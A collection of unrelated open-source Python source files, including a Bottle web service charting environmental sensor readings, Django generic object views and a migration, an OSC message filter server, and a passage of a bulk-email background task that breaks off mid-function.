"n" : "Noise (dB)",
"h" : "Humidity",
}
_SENSOR_PATH= {
"temperature" : "t",
"pressure" : "p",
"air_quality" : "a",
"luminosity" : "l",
"noise" : "n",
"humidity" : "h",
}
_SENSOR_BOUNDARIES= {
"t" : {"min" : 0, "max" : 50 },
"p" : {"min" : 0, "max" : 100 },
"a" : {"min" : 0, "max" : 200 },
"l" : {"min" : 0, "max" : 1024},
"n" : {"min" : 0, "max" : 1024},
"h" : {"min" : 0, "max" : 1024},
}
_SENSOR_FUNCTORS= {
"t" : (lambda t: t/10),
"p" : (lambda p: p/100),
"a" : (lambda a: a),
"l" : (lambda a: a),
"n" : (lambda a: a),
"h" : (lambda a: a),
}
_SENSOR_TEMPLATE = """<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Pollux'nz City Sensor charts -- %(uuid)s</title>
<link rel="stylesheet" type="text/css" href="/css/basic.css" />
<!-- 1. Add these JavaScript inclusions in the head of your page -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script src="http://cdn.jquerytools.org/1.2.5/tiny/jquery.tools.min.js"></script>
<script type="text/javascript" src="/js/highcharts.js"></script>
<!-- 1a) Optional: add a theme file
<script type="text/javascript" src="/js/themes/gray.js"></script>-->
<!-- 2. Add the JavaScript to initialize the chart on document ready -->
<script type="text/javascript">
var refreshRate = 30000 ;
var infoBulle = true ;
$(function() {
// setup ul.tabs to work as tabs for each div directly under div.panes
$("ul.tabs").tabs("div.panes > div");
});
Highcharts.setOptions({
global: {
useUTC: false
}
});
var chart;
$(document).ready(function() {
chart0 = new Highcharts.Chart({
chart: {
renderTo: 'container0',
defaultSeriesType: 'spline',
marginRight: 10,
events: {
load: function() {
// set up the updating of the chart each second
var series = this.series[0];
setInterval(function() {
var x = (new Date()).getTime(); // current time
var y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/luminosity.json",
async:false,
dataType:"json",
success:function(data){
y = data[0];
}
});
series.addPoint([x, y], true, true);
}, refreshRate);
}
}
},
title: {
text: 'Lumière'
},
xAxis: {
type: 'datetime',
tickPixelInterval: 150
},
yAxis: {
title: {
text: 'Value'
},
plotLines: [{
value: 0,
width: 1,
color: '#808080'
}]
},
tooltip: {
enabled: infoBulle,
formatter: function() {
return '<b>'+ this.series.name +'</b><br/>'+
Highcharts.dateFormat('%%Y-%%m-%%d %%H:%%M:%%S', this.x) +'<br/>'+
Highcharts.numberFormat(this.y, 2);
}
},
legend: {
enabled: false
},
exporting: {
enabled: false
},
series: [{
name: 'Lumière',
data: (function() {
// generate an array of random data
var data = [],
time = (new Date()).getTime(),
i, y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/luminosity.json",
async:false,
dataType:"json",
success:function(data){
y = data;
}
});
for (i = -19; i <= 0; i++) {
data.push({
x: time + i * 1000,
y: y[i*-1]
});
}
return data;
})()
}]
});
chart1 = new Highcharts.Chart({
chart: {
renderTo: 'container1',
defaultSeriesType: 'spline',
marginRight: 10,
events: {
load: function() {
// set up the updating of the chart each second
var series = this.series[0];
setInterval(function() {
var x = (new Date()).getTime(); // current time
var y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/temperature.json",
async:false,
dataType:"json",
success:function(data){
y = data[0];
}
});
series.addPoint([x, y], true, true);
}, refreshRate);
}
}
},
title: {
text: 'Température'
},
xAxis: {
type: 'datetime',
tickPixelInterval: 150
},
yAxis: {
title: {
text: 'Value'
},
plotLines: [{
value: 0,
width: 1,
color: '#808080'
}]
},
tooltip: {
enabled: infoBulle,
formatter: function() {
return '<b>'+ this.series.name +'</b><br/>'+
Highcharts.dateFormat('%%Y-%%m-%%d %%H:%%M:%%S', this.x) +'<br/>'+
Highcharts.numberFormat(this.y, 2);
}
},
legend: {
enabled: false
},
exporting: {
enabled: false
},
series: [{
name: 'Température',
data: (function() {
// generate an array of random data
var data = [],
time = (new Date()).getTime(),
i, y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/temperature.json",
async:false,
dataType:"json",
success:function(data){
y = data;
}
});
for (i = -19; i <= 0; i++) {
data.push({
x: time + i * 1000,
y: y[i*-1]
});
}
return data;
})()
}]
});
chart2 = new Highcharts.Chart({
chart: {
renderTo: 'container2',
defaultSeriesType: 'spline',
marginRight: 10,
events: {
load: function() {
// set up the updating of the chart each second
var series = this.series[0];
setInterval(function() {
var x = (new Date()).getTime(); // current time
var y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/humidity.json",
async:false,
dataType:"json",
success:function(data){
y = data[0];
}
});
series.addPoint([x, y], true, true);
}, refreshRate);
}
}
},
title: {
text: 'Humidité'
},
xAxis: {
type: 'datetime',
tickPixelInterval: 150
},
yAxis: {
title: {
text: 'Value'
},
plotLines: [{
value: 0,
width: 1,
color: '#808080'
}]
},
tooltip: {
enabled: infoBulle,
formatter: function() {
return '<b>'+ this.series.name +'</b><br/>'+
Highcharts.dateFormat('%%Y-%%m-%%d %%H:%%M:%%S', this.x) +'<br/>'+
Highcharts.numberFormat(this.y, 2);
}
},
legend: {
enabled: false
},
exporting: {
enabled: false
},
series: [{
name: 'Humidité',
data: (function() {
// generate an array of random data
var data = [],
time = (new Date()).getTime(),
i, y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/humidity.json",
async:false,
dataType:"json",
success:function(data){
y = data;
}
});
for (i = -19; i <= 0; i++) {
data.push({
x: time + i * 1000,
y: y[i*-1]
});
}
return data;
})()
}]
});
chart0 = new Highcharts.Chart({
chart: {
renderTo: 'container3',
defaultSeriesType: 'spline',
marginRight: 10,
events: {
load: function() {
// set up the updating of the chart each second
var series = this.series[0];
setInterval(function() {
var x = (new Date()).getTime(); // current time
var y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/noise.json",
async:false,
dataType:"json",
success:function(data){
y = data[0];
}
});
series.addPoint([x, y], true, true);
}, refreshRate);
}
}
},
title: {
text: 'Bruit'
},
xAxis: {
type: 'datetime',
tickPixelInterval: 150
},
yAxis: {
title: {
text: 'Value'
},
plotLines: [{
value: 0,
width: 1,
color: '#808080'
}]
},
tooltip: {
enabled: infoBulle,
formatter: function() {
return '<b>'+ this.series.name +'</b><br/>'+
Highcharts.dateFormat('%%Y-%%m-%%d %%H:%%M:%%S', this.x) +'<br/>'+
Highcharts.numberFormat(this.y, 2);
}
},
legend: {
enabled: false
},
exporting: {
enabled: false
},
series: [{
name: 'Bruit',
data: (function() {
// generate an array of random data
var data = [],
time = (new Date()).getTime(),
i, y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/noise.json",
async:false,
dataType:"json",
success:function(data){
y = data;
}
});
for (i = -19; i <= 0; i++) {
data.push({
x: time + i * 1000,
y: y[i*-1]
});
}
return data;
})()
}]
});
chart0 = new Highcharts.Chart({
chart: {
renderTo: 'container4',
defaultSeriesType: 'spline',
marginRight: 10,
events: {
load: function() {
// set up the updating of the chart each second
var series = this.series[0];
setInterval(function() {
var x = (new Date()).getTime(); // current time
var y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/air_quality.json",
async:false,
dataType:"json",
success:function(data){
y = data[0];
}
});
series.addPoint([x, y], true, true);
}, refreshRate);
}
}
},
title: {
text: 'Qualité de l\\'air'
},
xAxis: {
type: 'datetime',
tickPixelInterval: 150
},
yAxis: {
title: {
text: 'Value'
},
plotLines: [{
value: 0,
width: 1,
color: '#808080'
}]
},
tooltip: {
enabled: infoBulle,
formatter: function() {
return '<b>'+ this.series.name +'</b><br/>'+
Highcharts.dateFormat('%%Y-%%m-%%d %%H:%%M:%%S', this.x) +'<br/>'+
Highcharts.numberFormat(this.y, 2);
}
},
legend: {
enabled: false
},
exporting: {
enabled: false
},
series: [{
name: 'Qualité de l\\'air',
data: (function() {
// generate an array of random data
var data = [],
time = (new Date()).getTime(),
i, y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/air_quality.json",
async:false,
dataType:"json",
success:function(data){
y = data;
}
});
for (i = -19; i <= 0; i++) {
data.push({
x: time + i * 1000,
y: y[i*-1]
});
}
return data;
})()
}]
});
chart0 = new Highcharts.Chart({
chart: {
renderTo: 'container5',
defaultSeriesType: 'spline',
marginRight: 10,
events: {
load: function() {
// set up the updating of the chart each second
var series = this.series[0];
setInterval(function() {
var x = (new Date()).getTime(); // current time
var y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/pressure.json",
async:false,
dataType:"json",
success:function(data){
y = data[0];
}
});
series.addPoint([x, y], true, true);
}, refreshRate);
}
}
},
title: {
text: 'Pression de l\\'air'
},
xAxis: {
type: 'datetime',
tickPixelInterval: 150
},
yAxis: {
title: {
text: 'Value'
},
plotLines: [{
value: 0,
width: 1,
color: '#808080'
}]
},
tooltip: {
enabled: infoBulle,
formatter: function() {
return '<b>'+ this.series.name +'</b><br/>'+
Highcharts.dateFormat('%%Y-%%m-%%d %%H:%%M:%%S', this.x) +'<br/>'+
Highcharts.numberFormat(this.y, 2);
}
},
legend: {
enabled: false
},
exporting: {
enabled: false
},
series: [{
name: 'Pression de l\\'air',
data: (function() {
// generate an array of random data
var data = [],
time = (new Date()).getTime(),
i, y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/pressure.json",
async:false,
dataType:"json",
success:function(data){
y = data;
}
});
for (i = -19; i <= 0; i++) {
data.push({
x: time + i * 1000,
y: y[i*-1]
});
}
return data;
})()
}]
});
});
</script>
</head>
<body>
<a href="/"><img src="/img/polluxnzcity.png" alt="Logo Pollux NZ City" /></a>
<!-- the tabs -->
<ul class="tabs">
<li><a href="#1">Lumière</a></li>
<li><a href="#2">Température</a></li>
<li><a href="#3">Humidité</a></li>
<li><a href="#4">Bruit</a></li>
<li><a href="#5">Qualité de l\'air</a></li>
<li><a href="#6">Pression de l\'air</a></li>
</ul>
<br />
<br />
<!-- tab "panes" -->
<div class="panes">
<div><div id="container0" style="width: 800px; height: 400px; margin: 0 auto"></div></div>
<div><div id="container1" style="width: 800px; height: 400px; margin: 0 auto"></div></div>
<div><div id="container2" style="width: 800px; height: 400px; margin: 0 auto"></div></div>
<div><div id="container3" style="width: 800px; height: 400px; margin: 0 auto"></div></div>
<div><div id="container4" style="width: 800px; height: 400px; margin: 0 auto"></div></div>
<div><div id="container5" style="width: 800px; height: 400px; margin: 0 auto"></div></div>
</div>
<div id="footer">
<hr />
Pollux'NZ City Project by <a href="http://hackable-devices.org">CKAB</a>
</div>
</body>
</html>
"""
_INDEX_TEMPLATE="""
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/css/basic.css" />
<head>
<title>PolluxNZCity</title>
</head>
<body>
<div id="head">
<a href="/"><img src="/img/polluxnzcity.png" alt="Logo Pollux NZ City" /></a>
</div>
<div id="main">
<ul>
%s
</ul>
</div>
<div id="foot">Pollux'NZCity project</div>
</body>
</html>
"""
@route('/push/pollux/:serial:/values')
def push_data(serial="none"):
"""
this is the URL that calls the arduino:
/push/pollux/5d47051f-d265-4e85-9316-b662ed3041f/values?a=0074&l=3890&n=0020&h=0349&p=10167&t=291
where t = temperature (21 degC = 210)
p = pressure (*100 in pascal)
a = air quality
l = luminosity (lux)
n = noise sensor
h = humidity
"""
log.debug('serial id is : %s' % serial)
log.debug('got: a=%(a)s, l=%(l)s, n=%(n)s, h=%(h)s, t=%(t)s, p=%(p)s' % request.GET)
if len(data) != 0:
for k in data[serial]:
if k in request.GET:
try:
data[serial][k].append(_SENSOR_FUNCTORS[k](int(request.GET[k])))
if len(data[serial][k]) > 25:
data[serial][k] = data[serial][k][-25:]
except KeyError:
data[serial][k].append(int(request.GET[k]))
else:
try:
data[serial] = dict([(k,[_SENSOR_FUNCTORS[k](int(v))]) if k in _SENSOR_FUNCTORS.keys() else (k,[int(v)]) for k,v in request.GET.iteritems() ])
except KeyError:
data[serial] = dict([(k,[int(v)]) for k,v in request.GET.iteritems()])
log.debug('data global is : %s ' % data)
return 'OK'
@route('/pull/pollux/:serial:')
def visualize(serial):
if serial in data.keys():
return _SENSOR_TEMPLATE % {"uuid":serial}
else:
return """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>PolluxNZCity</title>
</head>
<body>
<div id="head">
<a href="/"><img src="/img/polluxnzcity.png" alt="Logo Pollux NZ City" /></a>
</div>
<div id="main">
ERROR: This sensor did not send data to the platform.
</div>
<div id="foot">Pollux'NZCity project</div>
</body>
</html>
"""
@route('/pull/pollux/:serial:/:sensor:.json')
def pull_sensor(serial, sensor):
values = [str(i) for i in data[serial][_SENSOR_PATH[sensor]]]
values.reverse()
log.debug("content: %s" % values)
if len(values) < 20:
print '['+','.join(values+(20-len(values))*['0'])+']'
return '['+','.join(values+(20-len(values))*['0'])+']'
return '['+','.join(values)+']'
@route('')
@route('/')
@route('/index.html')
def index():
pc_list = ""
for serial in data.keys():
pc_list += " <li> PolluxNZCity sensor whose uuid is <a href='/pull/pollux/%s'>%s</a> </li>\n" % (serial, serial)
if pc_list == "":
pc_list = "<h1>No sensor has sent data to the platform.</h1>\nPlease wait for new data to come..."
return _INDEX_TEMPLATE % pc_list
@route('/img/:img:')
def get_img(img):
return static_file(img, root="img/")
@route('/css/:css:')
def get_css(css):
return static_file(css, root="css/")
@route('/js/:js:')
def get_js(js):
return static_file(js, root="js/")
@route('/favicon.ico')
def favicon():
return ""
def init_service(host_addr, host_port, dbg=True):
debug(dbg)
run(host=host_addr, port=host_port)
if __name__ == '__main__':
global log
global data
data = {}
parser = OptionParser()
parser.add_option("-H", "--host", dest="hostname",
help="IP address to start the service on", metavar="HOST", default="0.0.0.0")
parser.add_option("-p", "--port", dest="port",
help="Port to start the service on", metavar="PORT", default="8000")
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose", default=False,
help="print more information messages to stdout")
(options, args) = parser.parse_args()
if options.verbose == True : level=logging.DEBUG
else: level=logging.ERROR
logging.basicConfig(stream=sys.stdout, level=level)
log = logging.getLogger('polluxinthecloud')
log.debug("starting service...")
init_service(options.hostname, options.port, dbg=options.verbose)
|
guyzmo/PolluxNZcity_PoC
|
PolluxInTheCloud/polluxinthecloud.py
|
Python
|
gpl-3.0
| 19,860
|
import six
from django.forms.models import ModelFormMetaclass, ModelForm
from django.template import loader
from django.http import Http404, HttpResponse, HttpResponseRedirect
from django.core.exceptions import ObjectDoesNotExist, ImproperlyConfigured
from django.utils.translation import ugettext
from django.contrib.auth.views import redirect_to_login
from django.views.generic import GenericViewError
from django.contrib import messages
def apply_extra_context(extra_context, context):
"""
Adds items from extra_context dict to context. If a value in extra_context
is callable, then it is called and the result is added to context.
"""
for key, value in six.iteritems(extra_context):
if callable(value):
context[key] = value()
else:
context[key] = value
def get_model_and_form_class(model, form_class):
"""
Returns a model and form class based on the model and form_class
parameters that were passed to the generic view.
If ``form_class`` is given then its associated model will be returned along
with ``form_class`` itself. Otherwise, if ``model`` is given, ``model``
itself will be returned along with a ``ModelForm`` class created from
``model``.
"""
if form_class:
return form_class._meta.model, form_class
if model:
# The inner Meta class fails if model = model is used for some reason.
tmp_model = model
# TODO: we should be able to construct a ModelForm without creating
# and passing in a temporary inner class.
class Meta:
model = tmp_model
class_name = model.__name__ + 'Form'
form_class = ModelFormMetaclass(
class_name, (ModelForm,), {'Meta': Meta})
return model, form_class
raise GenericViewError("Generic view must be called with either a model or"
" form_class argument.")
def redirect(post_save_redirect, obj):
"""
Returns a HttpResponseRedirect to ``post_save_redirect``.
``post_save_redirect`` should be a string, and can contain named string-
substitution place holders of ``obj`` field names.
If ``post_save_redirect`` is None, then redirect to ``obj``'s URL returned
by ``get_absolute_url()``. If ``obj`` has no ``get_absolute_url`` method,
then raise ImproperlyConfigured.
This function is meant to handle the post_save_redirect parameter to the
``create_object`` and ``update_object`` views.
"""
if post_save_redirect:
return HttpResponseRedirect(post_save_redirect % obj.__dict__)
elif hasattr(obj, 'get_absolute_url'):
return HttpResponseRedirect(obj.get_absolute_url())
else:
raise ImproperlyConfigured(
"No URL to redirect to. Either pass a post_save_redirect"
" parameter to the generic view or define a get_absolute_url"
" method on the Model.")
def lookup_object(model, object_id, slug, slug_field):
"""
Return the ``model`` object with the passed ``object_id``. If
``object_id`` is None, then return the object whose ``slug_field``
equals the passed ``slug``. If ``slug`` and ``slug_field`` are not passed,
then raise Http404 exception.
"""
lookup_kwargs = {}
if object_id:
lookup_kwargs['%s__exact' % model._meta.pk.name] = object_id
elif slug and slug_field:
lookup_kwargs['%s__exact' % slug_field] = slug
else:
raise GenericViewError(
"Generic view must be called with either an object_id or a"
" slug/slug_field.")
try:
return model.objects.get(**lookup_kwargs)
except ObjectDoesNotExist:
raise Http404("No %s found for %s"
% (model._meta.verbose_name, lookup_kwargs))
def create_object(
request, model=None, template_name=None,
template_loader=loader, extra_context=None, post_save_redirect=None,
login_required=False, context_processors=None, form_class=None):
"""
Generic object-creation function.
Templates: ``<app_label>/<model_name>_form.html``
Context:
form
the form for the object
"""
if extra_context is None:
extra_context = {}
if login_required and not request.user.is_authenticated():
return redirect_to_login(request.path)
model, form_class = get_model_and_form_class(model, form_class)
if request.method == 'POST':
form = form_class(request.POST, request.FILES)
if form.is_valid():
new_object = form.save()
msg = ugettext("The %(verbose_name)s was created successfully.") %\
{"verbose_name": model._meta.verbose_name}
messages.success(request, msg, fail_silently=True)
return redirect(post_save_redirect, new_object)
else:
form = form_class()
# Create the template, context, response
if not template_name:
template_name = "%s/%s_form.html" % (
model._meta.app_label, model._meta.object_name.lower())
t = template_loader.get_template(template_name)
c = {
'form': form,
}
apply_extra_context(extra_context, c)
return HttpResponse(t.render(context=c, request=request))
def update_object(
request, model=None, object_id=None, slug=None,
slug_field='slug', template_name=None, template_loader=loader,
extra_context=None, post_save_redirect=None, login_required=False,
context_processors=None, template_object_name='object',
form_class=None):
"""
Generic object-update function.
Templates: ``<app_label>/<model_name>_form.html``
Context:
form
the form for the object
object
the original object being edited
"""
if extra_context is None:
extra_context = {}
if login_required and not request.user.is_authenticated():
return redirect_to_login(request.path)
model, form_class = get_model_and_form_class(model, form_class)
obj = lookup_object(model, object_id, slug, slug_field)
if request.method == 'POST':
form = form_class(request.POST, request.FILES, instance=obj)
if form.is_valid():
obj = form.save()
msg = ugettext("The %(verbose_name)s was updated successfully.") %\
{"verbose_name": model._meta.verbose_name}
messages.success(request, msg, fail_silently=True)
return redirect(post_save_redirect, obj)
else:
form = form_class(instance=obj)
if not template_name:
template_name = "%s/%s_form.html" % (
model._meta.app_label, model._meta.object_name.lower())
t = template_loader.get_template(template_name)
c = {
'form': form,
template_object_name: obj,
}
apply_extra_context(extra_context, c)
response = HttpResponse(t.render(context=c, request=request))
return response
def delete_object(
request, model, post_delete_redirect, object_id=None,
slug=None, slug_field='slug', template_name=None,
template_loader=loader, extra_context=None, login_required=False,
context_processors=None, template_object_name='object'):
"""
Generic object-delete function.
The given template will be used to confirm deletetion if this view is
fetched using GET; for safty, deletion will only be performed if this
view is POSTed.
Templates: ``<app_label>/<model_name>_confirm_delete.html``
Context:
object
the original object being deleted
"""
if extra_context is None:
extra_context = {}
if login_required and not request.user.is_authenticated():
return redirect_to_login(request.path)
obj = lookup_object(model, object_id, slug, slug_field)
if request.method == 'POST':
obj.delete()
msg = ugettext("The %(verbose_name)s was deleted.") %\
{"verbose_name": model._meta.verbose_name}
messages.success(request, msg, fail_silently=True)
return HttpResponseRedirect(post_delete_redirect)
else:
if not template_name:
template_name = "%s/%s_confirm_delete.html" % (
model._meta.app_label, model._meta.object_name.lower())
t = template_loader.get_template(template_name)
c = {
template_object_name: obj,
}
apply_extra_context(extra_context, c)
response = HttpResponse(t.render(context=c, request=request))
return response
|
Karaage-Cluster/karaage-debian
|
karaage/common/create_update.py
|
Python
|
gpl-3.0
| 8,549
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-09-14 18:48
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('authorization', '0004_auto_20170628_1323'),
]
operations = [
migrations.AlterField(
model_name='authorization',
name='authorization_codename',
field=models.CharField(choices=[('royalty_reports:can_consult_royalty_reports', 'Consulter les rapports de redevances'), ('editor:can_edit_journal_information', 'Modifier la page À propos'), ('authorization:can_manage_authorizations', 'Autorisations'), ('subscriptions:can_manage_individual_subscription', 'Gérer les abonnements '), ('editor:can_manage_issuesubmission', 'Déposer des fichiers de production'), ('subscriptions:can_manage_organisation_members', 'Gérer les membres d’un abonnement'), ('subscriptions:can_manage_organisation_subscription_information', 'Gérer les informations d’un abonnement'), ('subscriptions:can_manage_organisation_subscription_ips', 'Gérer les adresses IP de l’abonnement'), ('editor:can_review_issuesubmission', 'Valider les numéros')], max_length=100, verbose_name='Autorisation'),
),
]
|
erudit/zenon
|
eruditorg/core/authorization/migrations/0005_auto_20170914_1348.py
|
Python
|
gpl-3.0
| 1,272
|
# -*- coding: utf-8 -*-
"""This module implements the standalone filtering tool in the chaosc framework.
It uses the chaosc osc_lib but does not depend on chaosc features, so it can
be used with other osc compatible gear.
We provide here osc message filtering based on python regex defined in a file
and a very flexible transcoding toolchain, but it's up to your python skills
to master them. The TranscoderBaseHandler subclasses should be defined in the
appropriate python module you place in the config directory. Please refer for
a howto/examples to our comprehensive docs or look into the provided example
transcoding.py file.
"""
# This file is part of chaosc
#
# chaosc is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# chaosc is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with chaosc. If not, see <http://www.gnu.org/licenses/>.
#
# Copyright (C) 2012-2014 Stefan Kögl
from __future__ import absolute_import
import sys, os, os.path, re, atexit
from operator import itemgetter
from datetime import datetime
from chaosc.simpleOSCServer import SimpleOSCServer
import chaosc._version
from chaosc.argparser_groups import ArgParser
from chaosc.lib import resolve_host
class FilterOSCServer(SimpleOSCServer):
"""OSC filtering/transcoding middleware
"""
def __init__(self, args):
"""ctor for filter server
loads scene filters
:param args: return value of argparse.parse_args
:type args: namespace object
"""
print "%s: starting up chaosc_filter-%s..." % (datetime.now().strftime("%x %X"), chaosc._version.__version__)
SimpleOSCServer.__init__(self, args)
self.forward_address = resolve_host(args.forward_host, args.forward_port)
self.config_dir = args.filtering_config_dir
self.scene = (list(), list())
self.scenes = [self.scene,]
self.scene_id = 0
self.load_filters()
def load_filters(self):
now = datetime.now().strftime("%x %X")
print "%s: loading filter configs..." % now
regex = re.compile("filter_(\d+)\.config")
scene_filters = list()
for i in os.listdir(self.config_dir):
regex_res = regex.match(i)
if (regex_res is not None and
os.path.isfile(os.path.join(self.config_dir, i))):
scene_filters.append((regex_res.group(1), i))
if not scene_filters:
return
scene_filters.sort(key=itemgetter(0))
if scene_filters[0][0] > len(scene_filters):
print "Warning: some filter config files for scenes are missing. " \
"Your scene filters will be out of sync!"
for ix, scene_filter in scene_filters:
print "%s: loading filter config for scene %s..." % (now, ix)
lines = open(
os.path.join(self.config_dir, scene_filter)).readlines()
for line in lines:
liste, regex = line.strip("\n").strip().split("=")
if liste == "blacklist":
self.scene[1].append(re.compile(regex))
else:
self.scene[0].append(re.compile(regex))
print "%s: new %s entry = %r..." % (
datetime.now().strftime("%x %X"), liste, regex)
self.scenes.append((list(), list()))
print "%s: loaded %d scenes" % (now, len(scene_filters))
def filter(self, osc_address):
send = False
#whitelist checks
for predicate in self.scene[0]:
if predicate.match(osc_address):
send = True
break
#blacklist checks
for predicate in self.scene[1]:
if predicate.match(osc_address):
send = False
break
return send
def dispatchMessage(self, osc_address, typetags, args, packet,
client_address):
"""Handles this filtering, transcoding steps and forwards the result
:param osc_address: the OSC address string.
:type osc_address: str
:param typetags: the typetags of args
:type typetags: list
:param args: the osc message args
:type args: list
:param packet: the binary representation of a osc message
:type packet: str
:param client_address: (host, port) of the requesting client
:type client_address: tuple
"""
now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
if osc_address == "/scene":
print "%s: switching scene from %d to %d" % (
now, self.scene_id, args[0])
self.scene_id = args[0]
self.scene = self.scenes[self.scene_id]
return
elif osc_address == "/forward":
self.scene_id += 1
self.scene = self.scenes[self.scene_id]
print "%s: switching scene forward to %d" % (now, self.scene_id)
return
elif osc_address == "/back":
self.scene_id -= 1
self.scene = self.scenes[self.scene_id]
print "%s: switching scene back to %d" % (now, self.scene_id)
return
if not self.filter(osc_address):
return
self.socket.sendto(packet, self.forward_address)
def main():
arg_parser = ArgParser("chaosc_filter")
arg_parser.add_global_group()
arg_parser.add_client_group()
arg_parser.add_chaosc_group
arg_parser.add_subscriber_group()
arg_parser.add_forward_group
arg_parser.add_filtering_group
args = arg_parser.finalize()
server = FilterOSCServer(args)
atexit.register(server.unsubscribe_me)
server.serve_forever()
|
DerLiveCode/chaosc
|
chaosc/chaosc_filter.py
|
Python
|
gpl-3.0
| 6,118
|
"""
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import unittest
from codeclib.fillib.util.settings import Settings
class SettingsTest(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_cli_arguments(self):
# TODO
pass
|
fneuorg/fneuproject
|
tests/settings_test.py
|
Python
|
gpl-3.0
| 863
|
from __future__ import absolute_import, unicode_literals
import csv
from builtins import str
import time
import os, sys
# setting django environment
from django.core.wsgi import get_wsgi_application
from config import *
sys.path.append(SPOKEN_PATH)
os.environ["DJANGO_SETTINGS_MODULE"] = "spoken.settings"
application = get_wsgi_application()
from .models import AsyncCronMail
from datetime import datetime
from django.utils import timezone
from django.conf import settings
import uuid
from django.core.mail import EmailMultiAlternatives
from django.core.validators import validate_email
from django.core.exceptions import ValidationError
from smtplib import SMTPException, SMTPServerDisconnected
from django.core.mail import BadHeaderError
from rq.decorators import job
from cron import REDIS_CLIENT, DEFAULT_QUEUE, TOPPER_QUEUE
from rq import Retry
import time
from rq import get_current_job
from django.core.cache import caches
from mdldjango.models import MdlUser, MdlQuizGrades
from events.models import FossMdlCourses, TestAttendance, State, City, InstituteType
from creation.models import FossCategory
def bulk_email(taskid, *args, **kwargs):
task = AsyncCronMail.objects.get(pk=taskid)
if task.log_file.name == "":
log_file_name = 'log_email_'+uuid.uuid4().hex+".csv"
task.log_file.name = 'emails/' + log_file_name
task.save()
with open(settings.MEDIA_ROOT + task.log_file.name, "a") as log_file:
with open(task.csvfile.path, newline='') as csvfile:
csvreader = list(csv.reader(csvfile, delimiter=' ', quotechar='|'))
job = get_current_job()
try:
row_id=int(job.meta['row_id'])
except:
row_id =0
try:
sent=int(job.meta['sent'])
except:
sent=0
try:
errors=int(job.meta['errors'])
except:
errors=0
for i,row in enumerate(csvreader[row_id:], row_id):
job.meta['row_id'] = i
job.save_meta()
if len(row) < 1:
continue
if i%10 == 0:
print('Total ran: ',i)
time.sleep(5)
email = EmailMultiAlternatives(
task.subject, task.message, task.sender,
to = [row[0]],
headers = {
"Content-type" : "text/html"
}
)
try:
validate_email(row[0])
email.attach_alternative(task.message, "text/html")
email.send()
sent += 1
job.meta['sent'] = sent
job.save_meta()
log_file.write(str(row[0])+','+str(1)+'\n')
except ValidationError as mail_error:
log_file.write(str(row[0])+','+str(0)+','+str(mail_error)+'\n')
errors+=1
job.meta['errors'] = errors
job.save_meta()
except SMTPException as send_error:
log_file.write(str(row[0])+','+str(0)+','+str('SMTP mail send error.')+'\n')
errors+=1
job.meta['errors'] = errors
job.save_meta()
except BadHeaderError as header_error:
log_file.write(str(row[0])+','+str(0)+','+str(header_error)+'\n')
errors+=1
job.meta['errors'] = errors
job.save_meta()
except ConnectionRefusedError as refused:
log_file.write(str(row[0])+','+str(0)+','+str('Failed to connect to SMTP server.')+'\n')
errors+=1
except SMTPServerDisconnected as disconnect:
log_file.write(str(row[0])+','+str(0)+','+str('Failed to connect to SMTP server.')+'\n')
errors+=1
job.meta['errors'] = errors
job.save_meta()
except OSError as e:
log_file.write(str(row[0])+','+str(0)+','+str('Failed to connect to SMTP server.')+'\n')
errors+=1
job.meta['errors'] = errors
job.save_meta()
task.completed_at = timezone.now()
task.report = "Total: "+ str(sent+errors)+"\n"+ "Sent: "\
+str(sent)+"\n"+"Errors: "+ str(errors)
task.status=True
task.save()
def async_bulk_email(task, *args, **kwargs):
DEFAULT_QUEUE.enqueue(bulk_email, task.pk, job_id=task.job_id, job_timeout='72h')
def filter_student_grades(key=None):
key_array=key.split(':')
foss=FossCategory.objects.filter(pk__in=[int(f) for f in key_array[0].split(';')])
state=State.objects.filter(pk__in=[int(s) if s != '' else None for s in key_array[1].split(';')])
city=City.objects.filter(pk__in=[int(c) if c != '' else None for c in key_array[2].split(';')])
